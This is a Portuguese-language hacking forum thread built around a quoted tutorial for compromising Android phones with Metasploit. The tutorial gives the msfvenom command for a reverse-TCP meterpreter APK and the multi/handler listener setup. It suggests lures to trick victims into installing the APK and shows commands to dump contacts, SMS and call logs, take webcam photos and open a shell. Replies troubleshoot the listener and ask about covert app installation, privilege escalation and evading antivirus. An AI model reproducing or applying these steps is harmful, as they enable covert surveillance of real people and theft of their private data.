CaveiraTech Fórum
collapse

Tutorial invasão celular android por metasploit


Offline phyron

  • L4MM3R
  • *
    • Posts: 6
  • Liked: 0
  • Likes Given: 6
You are not allowed to view links. Register or Login
cd + o nome da pasta, exemplo: cd Android
já para efetuar o download da mesma, é só sair do modo shell e ir para meterpreter e passar o comando: download -d sua pasta e informar o caminho que será salvo, exemplo: meterpreter download -d pasta -> ~/Desktop/nome da pasta, acho que até mesmo pode deixar sem o nome da pasta no caminho para salvar, mas a sua pessoa deve efetuar o teste.

utiliza o pwd para informar o caminho, pois vai ficar melhor para salvar.

O.o
Funcionou, obrigado mesmo!!! :)


Offline scarhackking

  • L4MM3R
  • *
    • Posts: 1
  • Liked: 0
  • Likes Given: 0
consigo criar o msm atravez de outro SO ou seria melhor utilizar o linux


Offline maromba

  • L4MM3R
  • *
    • Posts: 1
  • Liked: 0
  • Likes Given: 0
esse encoder x86 ai n aceita instalar o apk malicioso depois de pronto qual eu uso que vai dar certo ?


Offline magoedmar

  • L4MM3R
  • *
    • Posts: 1
  • Liked: 0
  • Likes Given: 0
Bom dia. Eu criei o progama entrei no meu celular, porem n conseguir entrar nas pastas, como de foto e etc, como tenho q fazer. nem aparece essas pastas, consigo apenas tirar fotos pelo webcam_snap, mas queria era entrar nas pasta e fazer dowload. obrigado.


Offline washyngton santos

  • L4MM3R
  • *
    • Posts: 2
  • Liked: 0
  • Likes Given: 0
bom dia tds. excelente tópico. AJUDA com esta dúvida por favor, na hora que uso comando exploit aparece-me seguinte msg:
 Handler failed to bind to 10.25.15.61:43:-  -
  • Started reverse TCP handler on 0.0.0.0:43

Por que fail o IP?[/*]


Offline Grommash

  • L4MM3R
  • *
    • Posts: 4
  • Liked: 1
  • Likes Given: 0
É possível instalar e configurar um app no celular invadido sem que o dono perceba após feito isso?


Online kodo no kami

  • Elite
  • 1337
  • *
    • Posts: 603
    • forum eof
  • Liked: 381
  • Likes Given: 173
You are not allowed to view links. Register or Login
É possível instalar e configurar um app no celular invadido sem que o dono perceba após feito isso?

ai depende mano não sei te informar, tipo não sei como funcionar exatamente a instalação de um apk no celular, qual diretorio que é enviado o apk e qual arquivo é modificado indicando a instalação dele. So que tipo dependendo tu pode criar um programa nativo para o android para o arm não os apks, e iniciar ele via comando, poderia colocar ele no arquivo init ou sei la (so que isso precisa de root tambem), não sei se possivel executar um apk dessa forma tambem
sign: You are not allowed to view links. Register or Login
discord: You are not allowed to view links. Register or Login (kodo#0010)
steam: You are not allowed to view links. Register or Login


Offline xMrGCB

  • L4MM3R
  • *
    • Posts: 2
  • Liked: 1
  • Likes Given: 1
You are not allowed to view links. Register or Login
bom dia tds. excelente tópico. AJUDA com esta dúvida por favor, na hora que uso comando exploit aparece-me seguinte msg:
 Handler failed to bind to 10.25.15.61:43:-  -
  • Started reverse TCP handler on 0.0.0.0:43
    Por que fail o IP?


Já abri as portas do router. e ainda estou tendo o mesmo erro



Offline Karsa

  • 1337
  • *****
    • Posts: 629
    • Executando Hacking no WhatsApp
  • Liked: 203
  • Likes Given: 48
  • Started reverse TCP handler on 0.0.0.0:43
    Por que fail o IP?
You are not allowed to view links. Register or Login


Já abri as portas do router. e ainda estou tendo o mesmo erro


Passou o IP correto?  
Não precisa abrir portas para fazer testes em rede interna.
Configuração da rede da vm bridge ou Nat, simplificando bridge = DHCP, vm vai receber a mesma faixa de IP do seu Notebook, Desktop, Smartphone whatever. NAT: "configuração padrão" da mv, não recebe DHCP.
A criação e configuração do .apk  foi com usuário root?
« Última modificação: 14 de Setembro de 2018, 14:37 por Karsa »
I'm just a technician
Gui and Command-line ❤️
Tudo o que tem um preço é barato. Só aquilo que o dinheiro não compra é realmente caro.


Offline GamerExpress

  • L4MM3R
  • *
    • Posts: 15
  • Oi eu sou o TeuCU
    • youtube.com/gamerexpress
  • Liked: 4
  • Likes Given: 0
Alguem me ajuda por favor, usei meu ip publico da internet e deu esse erro:

[-] Handler failed to bind to 201.150.50.18:10315:-  -
  • Started reverse TCP handler on 0.0.0.0:10315



o comando que usei foi esse
 set lhost You are not allowed to view links. Register or Login sendo esse meu ip da internet, o que pode ter sido este erro?[/*]
Cada um tem seu jeito, seu estilo e suas técnicas de "hackeamento" aprenda a lidar com os limites de sua mente, meta a cara nos desafios e leve este lema com você! -Só descanso quando meu jogo está ganho!-
Ass: GamerExpress


Offline Karsa

  • 1337
  • *****
    • Posts: 629
    • Executando Hacking no WhatsApp
  • Liked: 203
  • Likes Given: 48
You are not allowed to view links. Register or Login
Alguem me ajuda por favor, usei meu ip publico da internet e deu esse erro:

[-] Handler failed to bind to 201.150.50.18:10315:-  -
  • Started reverse TCP handler on 0.0.0.0:10315


    o comando que usei foi esse
     set lhost You are not allowed to view links. Register or Login sendo esse meu ip da internet, o que pode ter sido este erro?

Quero compreender a parte desse endereço externo? Pois se estiver fazendo testes em rede interna, nem precisa disso. Já se for para rede externa, vai ter que mudar as configurações da placa de rede (bridge), aconselho fortemente que a sua pessoa estude mais.
I'm just a technician
Gui and Command-line ❤️
Tudo o que tem um preço é barato. Só aquilo que o dinheiro não compra é realmente caro.


Offline luispaulo21

  • L4MM3R
  • *
    • Posts: 14
  • Liked: 3
  • Likes Given: 19
You are not allowed to view links. Register or Login
e ae galera nesse tutorial vou mostrar como seria a invasão a um celular android com metasploit, no caso o metasploit quando usado como um exploit ele funciona em duas etapas o exploit dele explora a vulnerabilidade e depois disso entra o payload que permite a interação com o sistema invadido (tambem existem os posts que seria codigos pos-invasão com funcionamentos espeficos),  alem do uso de exploit o metasploit permite criar payloads auto executaveis que funciona como trojans assim nao seria preciso que tenha uma vulnerabilidade para ser explorada bastaria a vitima executar esse artefato malicioso para ter o sistema invadido, para a gente criar o payload auto executavel usamos o msfvenom (ou antigo msfpayload) nele temos que usar o argumento -p seguido do payload que vamos usar nesse caso o "android/meterpreter/reverse_tcp" usamos tambem o argumento --platform espeficificando a plataforma que no caso é o android, tambem usamos o -o seguido do arquivo apk de saida, temos que setar duas opções no payload que é o LHOST= seguido do IP reverso no caso sendo ele o IP da sua maquina (ou seu IP publico caso o ataque seja pela internet e nao sua rede local) e por fim LPORT com a porta que vamos esta usando na conexao

Código: You are not allowed to view links. Register or Login
sudo msfvenom -p android/meterpreter/reverse_tcp --platform android -o kodo.apk LHOST=192.168.1.1 LPORT=10315
You are not allowed to view links. Register or Login



com o apk pronto bastaria enviar ele para vitima porem antes disso temos  que preparar o metasploit para receber a conexao para fazer isso abrimos o metasploit

Código: You are not allowed to view links. Register or Login
sudo msfconsole
You are not allowed to view links. Register or Login



agora usamos um codigo que vai permite a conexao reversa de diversos tipos de exploits que seria o "exploit/multi/handler"

Código: You are not allowed to view links. Register or Login
use exploit/multi/handler
You are not allowed to view links. Register or Login



agora temos que setar 3 opções a primeira seria o payload que estamos usando que no caso seria "android/meterpreter/reverse_tcp"

Código: You are not allowed to view links. Register or Login
set payload android/meterpreter/reverse_tcp
You are not allowed to view links. Register or Login

a segunda opção é lhost que seria o IP que a gente definiu no payload no meu caso foi 192.168.1.1

Código: You are not allowed to view links. Register or Login
set lhost 192.168.1.1
You are not allowed to view links. Register or Login

a ultima opção é o lport que seria a porta que a gente coloco no payload no meu caso foi 10315

Código: You are not allowed to view links. Register or Login
set lport 10315
You are not allowed to view links. Register or Login



pronto agora executamos isso com o comando exploit e ele vai ficar aguardando a conexao

Código: You are not allowed to view links. Register or Login
exploit
You are not allowed to view links. Register or Login



agora basta enviar o arquivo apk para o celular e instalar nele ai entra aquela parte engenharia social e tal (olha o joguinho free, creditos de graça, meus nudes, eu ja vi cada uma que nem te conto kkk)



depois de instalado voce tera acesso ao terminal do meterpreter no metasploit



voce pode usar o comando help para ver todos os comandos que o meterpreter permite

Código: You are not allowed to view links. Register or Login
help
You are not allowed to view links. Register or Login



como sao muitos comandos apenas vou listar alguns em alto, com o comando sysinfo voce ver informação do sistema como a versao do android e arquitetura, com o comando webcam_list ele lista as webcams do aparelho

Código: You are not allowed to view links. Register or Login
sysinfo

Código: You are not allowed to view links. Register or Login
webcam_list
You are not allowed to view links. Register or Login



com ps pode listar os processos rodando no aparelho

Código: You are not allowed to view links. Register or Login
ps
You are not allowed to view links. Register or Login



com o comando shell voce pode obter acesso ao terminal do sistema android

Código: You are not allowed to view links. Register or Login
shell
You are not allowed to view links. Register or Login



voce pode baixar os contatos, sms e logs de chamadas com o dump_contacts, dump_sms e dump_calllog

Código: You are not allowed to view links. Register or Login
dump_calllog

Código: You are not allowed to view links. Register or Login
dump_contacts

Código: You are not allowed to view links. Register or Login
dump_sms
You are not allowed to view links. Register or Login



voce pode tirar uma foto com a camera usando webcam_snap

Código: You are not allowed to view links. Register or Login
webcam_snap
You are not allowed to view links. Register or Login



entre outras coisas como gravar o audio ou filmar usando webcam, baixar ou enviar arquivo, enviar sms, ver geolocalização entre muitas coisas, então galera como podemos ver a invasão a um celular android não é uma coisa complicada de se fazer por isso deve tomar muito cuidado com os apk baixados  afinal basta um unico malware que a pessoa tem a acesso a quase tudo do seu celular da sua rede sem dizer que isso pode fica mais problematico ainda se seu celular estiver com root ja que pode modificar toda a estrutura do sistema criando rootkits e malwares que mesmo resetando ele continua instalado

by kodo no kami
Só não consegui instalar o APK no meu celular para testar. Desabilitei o google protect, permiti para instalar aplicativos fora da google play e msm assim não deu. Fica dizendo "Esse aplicativo não foi instalado."


Offline MicroJus

  • L4MM3R
  • *
    • Posts: 1
  • Liked: 0
  • Likes Given: 0
You are not allowed to view links. Register or Login
Alguem saberia como escalar os privilégios no android com o meterprete ?


Offline Bernardoo

  • L4MM3R
  • *
    • Posts: 2
  • Liked: 0
  • Likes Given: 5
Alguém já tentou executar esse payload nas novas versões do Android (versão 10)?

Tentei aqui, instalei no android, mas o app não abre e não informa nada no msfconsole.


Offline Y0ung1

  • L4MM3R
  • *
    • Posts: 4
  • Liked: 0
  • Likes Given: 0
Iae cara blz? 
Então eu fiz isso a dois dias atrás, mas tive alguns problemas para rodas certas coisas, por exemplo, no comando shell eu n posso Fzr praticamente nada kkkkkkkk.
E eu queria saber se não tem como "ocultar" o app para que o antivirus do celular não detecte ele já de primeira.


 

* CaveiraTech YouTube

* Facebook

Guilherme Junqueira
04 de Fevereiro de 2019, 18:01 por Guilherme Junqueira
Views: 67176 | Comments: 27

Infelizmente a seção de Grupos de estudos do fórum estava sendo usada por organizações criminosas para recruta...
Guilherme Junqueira
27 de Julho de 2018, 17:30 por Guilherme Junqueira
Views: 43427 | Comments: 64

Pessoal, estou pensando seriamente na possibilidade de criar um novo fórum, só que voltado 100% à programação....
Guilherme Junqueira
26 de Junho de 2018, 20:25 por Guilherme Junqueira
Views: 25656 | Comments: 41

Resolvi fazer uma enquete para ver qual o posicionamento político da maioria aqui no fórum. O Alobus já fez um...
Guilherme Junqueira
20 de Junho de 2018, 12:56 por Guilherme Junqueira
Views: 31180 | Comments: 63

Últimamente o fórum vem sofrendo com muitas pessoas postando pirataria e esse não é o intuito do mesmo. A pira...
Guilherme Junqueira
20 de Fevereiro de 2018, 20:18 por Guilherme Junqueira
Views: 19197 | Comments: 4

Boa noite pessoal, venho apresentar para vocêsYou are not allowed to view links. Register or Login...

* Equipe

Guilherme Junqueira admin Guilherme Junqueira
Administrador
Luiz Viana admin Luiz Viana
Administrador
Alobus gmod Alobus
Moderador Geral

* Tópicos Recentes